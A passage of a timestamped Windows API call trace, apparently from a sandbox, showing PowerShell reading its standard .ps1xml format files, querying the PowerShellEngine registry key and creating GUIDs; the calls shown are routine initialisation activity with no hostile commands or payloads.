lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.767] SetErrorMode (uMode=0x1) returned 0x1 [0073.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0073.767] SetErrorMode (uMode=0x1) returned 0x1 [0073.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0073.767] SetErrorMode (uMode=0x1) returned 0x1 [0073.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0073.767] SetErrorMode (uMode=0x1) returned 0x1 [0073.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0073.767] SetErrorMode (uMode=0x1) returned 0x1 [0073.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0073.768] SetErrorMode (uMode=0x1) returned 0x1 [0073.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0073.768] SetErrorMode (uMode=0x1) returned 0x1 [0073.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0073.768] SetErrorMode (uMode=0x1) returned 0x1 [0073.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0073.768] SetErrorMode (uMode=0x1) returned 0x1 [0073.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0073.768] SetErrorMode (uMode=0x1) returned 0x1 [0073.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0073.768] SetErrorMode (uMode=0x1) returned 0x1 [0073.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0073.769] SetErrorMode (uMode=0x1) returned 0x1 [0073.769] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.769] CoTaskMemFree (pv=0x3e46f0) [0073.772] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.772] CoTaskMemFree (pv=0x3e46f0) [0073.772] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.772] CoTaskMemFree (pv=0x3e46f0) [0073.772] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.773] CoTaskMemFree (pv=0x3e46f0) [0073.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.773] SetErrorMode (uMode=0x1) returned 0x1 [0073.773] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0073.773] GetFileType (hFile=0x318) returned 0x1 [0073.773] SetErrorMode (uMode=0x1) returned 0x1 [0073.773] GetFileType (hFile=0x318) returned 0x1 [0073.773] ReadFile (in: hFile=0x318, lpBuffer=0x33fdcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fdcf0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.775] ReadFile (in: hFile=0x318, lpBuffer=0x33fdcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fdcf0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.775] ReadFile (in: hFile=0x318, lpBuffer=0x33fdcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fdcf0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.776] ReadFile (in: hFile=0x318, lpBuffer=0x33fdcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fdcf0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.776] ReadFile (in: hFile=0x318, lpBuffer=0x33fdcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fdcf0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.777] ReadFile (in: hFile=0x318, lpBuffer=0x33fdcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fdcf0*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.777] ReadFile (in: hFile=0x318, lpBuffer=0x33fdcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fdcf0*, lpNumberOfBytesRead=0x1ad0f8*=0x9e2, lpOverlapped=0x0) returned 1 [0073.777] ReadFile (in: hFile=0x318, lpBuffer=0x33fd23a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fd23a*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.777] ReadFile (in: hFile=0x318, lpBuffer=0x33fdcf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x33fdcf0*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.778] SetErrorMode (uMode=0x1) returned 0x1 [0073.778] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0073.778] SetErrorMode (uMode=0x1) returned 0x1 [0073.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.778] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0073.778] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0073.778] CoTaskMemAlloc (cb=0x5a) returned 0x3eeaa0 [0073.779] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x3eeaa0, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0073.779] CoTaskMemFree (pv=0x3eeaa0) [0073.779] RegCloseKey (hKey=0x318) returned 0x0 [0073.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.782] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x558fc2a6, Data2=0x9912, Data3=0x4c4f, Data4=([0]=0x97, [1]=0xc9, [2]=0x2d, [3]=0xd1, [4]=0xdf, [5]=0x4a, [6]=0xd3, [7]=0x8a))) returned 0x0 [0073.786] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe9c1529d, Data2=0x63d6, Data3=0x4d87, Data4=([0]=0x92, [1]=0xd9, [2]=0xd8, [3]=0xf1, [4]=0x8c, [5]=0x9e, [6]=0x47, [7]=0xd9))) returned 0x0 [0073.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0073.787] SetErrorMode (uMode=0x1) returned 0x1 [0073.787] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0073.788] GetFileType (hFile=0x318) returned 0x1 [0073.788] SetErrorMode (uMode=0x1) returned 0x1 [0073.788] GetFileType (hFile=0x318) returned 0x1 [0073.788] ReadFile (in: hFile=0x318, lpBuffer=0x3428858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3428858*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.789] ReadFile (in: hFile=0x318, lpBuffer=0x3428858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3428858*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.790] ReadFile (in: hFile=0x318, lpBuffer=0x3428858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3428858*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.790] ReadFile (in: hFile=0x318, lpBuffer=0x3428858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3428858*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.791] ReadFile (in: hFile=0x318, lpBuffer=0x3428858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3428858*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.792] ReadFile (in: hFile=0x318, lpBuffer=0x3428858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3428858*, lpNumberOfBytesRead=0x1ad0f8*=0xfb2, lpOverlapped=0x0) returned 1 [0073.792] ReadFile (in: hFile=0x318, lpBuffer=0x3427f72, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3427f72*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.792] ReadFile (in: hFile=0x318, lpBuffer=0x3428858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3428858*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0073.792] SetErrorMode (uMode=0x1) returned 0x1 [0073.792] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0073.792] SetErrorMode (uMode=0x1) returned 0x1 [0073.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0073.793] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0073.793] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0073.793] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd150 [0073.793] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x1b3cd150, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0073.793] CoTaskMemFree (pv=0x1b3cd150) [0073.793] RegCloseKey (hKey=0x318) returned 0x0 [0073.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0073.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0073.795] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x3203e716, Data2=0x9d71, Data3=0x4470, Data4=([0]=0x89, [1]=0x5c, [2]=0x5f, [3]=0xee, [4]=0x9d, [5]=0x76, [6]=0xa9, [7]=0xdc))) returned 0x0 [0073.796] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xffbb445e, Data2=0x3dda, Data3=0x46f6, Data4=([0]=0x8d, [1]=0x60, [2]=0x38, [3]=0x5a, [4]=0x5d, [5]=0xc2, [6]=0x8a, [7]=0xff))) returned 0x0 [0073.796] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x9a47ca52, Data2=0x554f, Data3=0x44b0, Data4=([0]=0xb9, [1]=0xf1, [2]=0xed, [3]=0x81, [4]=0x11, [5]=0xe9, [6]=0x89, [7]=0x51))) returned 0x0 [0073.797] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x670b652e, Data2=0x999, Data3=0x4b35, Data4=([0]=0x82, [1]=0xdf, [2]=0x31, [3]=0x18, [4]=0x8c, [5]=0x99, [6]=0x9e, [7]=0xbe))) returned 0x0 [0073.797] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x52840d1c, Data2=0xf2a3, Data3=0x4115, Data4=([0]=0xbe, [1]=0xb5, [2]=0xc4, [3]=0x1e, [4]=0x6d, [5]=0x40, [6]=0x57, [7]=0x1c))) returned 0x0 [0073.797] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x40f03ced, Data2=0xeaae, Data3=0x412e, Data4=([0]=0x9a, [1]=0xd4, [2]=0xee, [3]=0xe, [4]=0x6b, [5]=0x85, [6]=0x29, [7]=0x5d))) returned 0x0 [0073.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.797] SetErrorMode (uMode=0x1) returned 0x1 [0073.798] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0073.798] GetFileType (hFile=0x318) returned 0x1 [0073.798] SetErrorMode (uMode=0x1) returned 0x1 [0073.798] GetFileType (hFile=0x318) returned 0x1 [0073.798] ReadFile (in: hFile=0x318, lpBuffer=0x34745b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x34745b8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.799] ReadFile (in: hFile=0x318, lpBuffer=0x34745b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x34745b8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.800] ReadFile (in: hFile=0x318, lpBuffer=0x34745b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x34745b8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.800] ReadFile (in: hFile=0x318, lpBuffer=0x34745b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x34745b8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.801] ReadFile (in: hFile=0x318, lpBuffer=0x34745b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x34745b8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.801] ReadFile (in: hFile=0x318, lpBuffer=0x34745b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x34745b8*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.801] ReadFile (in: hFile=0x318, lpBuffer=0x34745b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x34745b8*, lpNumberOfBytesRead=0x1ad0f8*=0xaca, lpOverlapped=0x0) returned 1 [0073.801] ReadFile (in: hFile=0x318, lpBuffer=0x3473bea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3473bea*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.801] ReadFile (in: hFile=0x318, lpBuffer=0x34745b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x34745b8*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.802] SetErrorMode (uMode=0x1) returned 0x1 [0073.802] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0073.802] SetErrorMode (uMode=0x1) returned 0x1 [0073.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.802] RegOpenKeyExW (in: hKey=0xffffffff80000002, 